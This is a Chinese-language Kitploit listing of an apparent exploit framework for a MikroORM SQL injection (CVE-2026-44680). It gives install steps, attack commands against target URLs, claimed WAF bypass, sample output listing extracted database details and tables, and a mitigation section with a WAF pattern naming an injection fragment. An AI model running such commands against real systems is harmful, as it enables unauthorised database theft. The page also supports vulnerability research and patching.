Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework — CVE-2026-44680 的 PoC 工具,影响 MikroORM ≤7.0.13。利用 JSON 路径注入,通过基于 UNION 的攻击提取数据库内容。具备漏洞检测、自动化数据提取、表枚举和盲注支持。包含针对 Burp Suite 的代理集成及 WAF 绕过技术。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework
渗透测试框架漏洞扫描器代码分析漏洞利用Web安全数据库安全
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

CVE-2026-44680 的 PoC 工具,影响 MikroORM ≤7.0.13。利用 JSON 路径注入,通过基于 UNION 的攻击提取数据库内容。具备漏洞检测、自动化数据提取、表枚举和盲注支持。包含针对 Burp Suite 的代理集成及 WAF 绕过技术。

查看仓库
1322个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-44680 - MikroORM SQL注入利用框架

Python Version License Status CVSS

面向安全研究人员的专业概念验证工具


🔍 概述

CVE-2026-44680 是一个影响 MikroORM(一个流行的 Node.js TypeScript ORM)的关键 SQL 注入漏洞。该利用框架为安全研究人员和渗透测试人员提供了一个专业工具,用于检测和利用该漏洞。

作者: Sudeepa Wanigarathna
版本: 1.0.0
分类: 专业安全研究工具


🚨 漏洞详情

属性值
CVE IDCVE-2026-44680
CVSS 评分7.6(高危)
攻击向量网络
攻击复杂度低
所需权限低

受影响版本

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

根本原因

MikroORM 在构建 JSON_EXTRACT 查询时未能正确转义运行时控制的 JSON 路径键。攻击者可以跳出 JSON 路径上下文并注入任意 SQL 代码。


✨ 功能特性

功能描述状态
漏洞检测基于时间 & 基于错误的检测✅
数据库提取版本、数据库、用户、主机名✅
表枚举自动发现所有表✅
基于 UNION 的注入通过 UNION SELECT 提取数据✅
盲注基于布尔值的字符提取✅
代理支持Burp Suite / 拦截代理✅
报告生成专业的 TXT 报告✅
WAF 绕过高级混淆技术✅

📦 安装

前提条件

# Python 3.8 或更高版本
python3 --version

# pip 包管理器
pip --version

安装步骤

步骤 1:克隆仓库

git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

步骤 2:安装依赖

# 使用 requirements.txt
pip install -r requirements.txt

# 或手动安装
pip install requests colorama tqdm urllib3 simplejson

步骤 3:验证安装

python exploit.py --help

requirements.txt

requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 快速开始

基本用法

# 完整利用
python exploit.py -u http://localhost:3000

# 仅漏洞检测
python exploit.py -u http://target.com --detect

# 提取数据库信息
python exploit.py -u http://target.com --extract

# 枚举表
python exploit.py -u http://target.com --enumerate

📖 使用指南

命令选项

标志描述默认值
-u, --url目标 URL(必需)-
-e, --endpointAPI 端点/api/users/search
-p, --proxyHTTP 代理无
-v, --verbose详细输出False
--detect仅检测漏洞False
--extract提取数据库信息False
--enumerate枚举表False
--blind盲注模式False

示例命令

1. 完整利用

python exploit.py -u http://192.168.1.100:3000

2. 自定义端点

python exploit.py -u http://target.com -e /api/v2/users/query

3. 使用代理(Burp Suite)

python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. 详细调试

python exploit.py -u http://target.com -v --extract

5. 盲注

python exploit.py -u http://target.com --blind

6. 仅检测

python exploit.py -u http://target.com --detect

7. 提取数据库信息

python exploit.py -u http://target.com --extract

8. 枚举表

python exploit.py -u http://target.com --enumerate

📊 输出示例

控制台输出

============================================================
  MikroORM CVE-2026-44680 利用框架
  作者:Sudeepa Wanigarathna
============================================================

[*] 正在对 /api/users/search 执行漏洞检测
[+] 存在基于时间的 SQL 注入漏洞

[+] 漏洞确认!

[*] 正在提取数据库信息...
[*] 正在枚举表...
[+] 发现表:users
[+] 发现表:products
[+] 发现表:orders
[+] 发现表:payments
[+] 发现表:admin

===== MIKROORM CVE-2026-44680 利用报告 =====
作者:Sudeepa Wanigarathna(安全研究员)
日期:2026-07-20 14:30:45
目标:http://localhost:3000

[*] 漏洞详情
    - CVE:CVE-2026-44680
    - CVSS 评分:7.6(高危)
    - 受影响组件:@mikro-orm/knex <= 6.6.13

[*] 数据库信息
    - 版本:10.11.6-MariaDB
    - 数据库:production_db
    - 用户:root@localhost
    - 主机名:localhost

[*] 枚举的表(发现 5 个)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] 报告已保存到 exploit_report_1742493645.txt
[+] 表列表已保存到 tables_1742493645.txt

生成的文件

exploit_report_1742493645.txt  # 完整的利用报告
tables_1742493645.txt          # 发现的表列表

🛡️ 缓解措施

即时措施

1. 更新 MikroORM

npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. 输入验证

const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. WAF 规则

# 阻止可疑的 JSON 路径模式
"filterField": "\$\.x'\) OR .* -- "

4. 数据库加固

  • 应用最小权限原则
  • 使用独立的数据库用户
  • 实施查询日志
  • 启用 SQL 注入检测

⚠️ 免责声明

重要: 本工具仅用于授权的安全测试和教育目的。

法律声明

  • ✅ 您必须获得明确许可 才能测试任何系统
  • ✅ 您需负责 因误用造成的任何损害
  • ✅ 请合乎道德地使用 并负责任地报告漏洞

道德使用指南

  1. 授权: 获得系统所有者的书面许可
  2. 报告: 向受影响厂商负责任地报告发现
  3. 保密: 在漏洞修补前不得披露
  4. 限制: 保持在授权测试范围内

📄 许可证

本项目采用 MIT 许可证。

MIT License

版权所有 (c) 2026 Sudeepa Wanigarathna

特此免费授予任何获得本软件及相关文档文件(“软件”)副本的人,不受限制地处理本软件的权利,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或出售本软件副本的权利,并允许获得本软件的人这样做,但须符合以下条件:
...

📚 参考

  • CVE-2026-44680 详情
  • MikroORM 安全公告
  • OWASP SQL 注入防御

为安全研究社区用心制作 ❤️

报告 Bug • 请求功能 • 在 GitHub 上星标

下载工具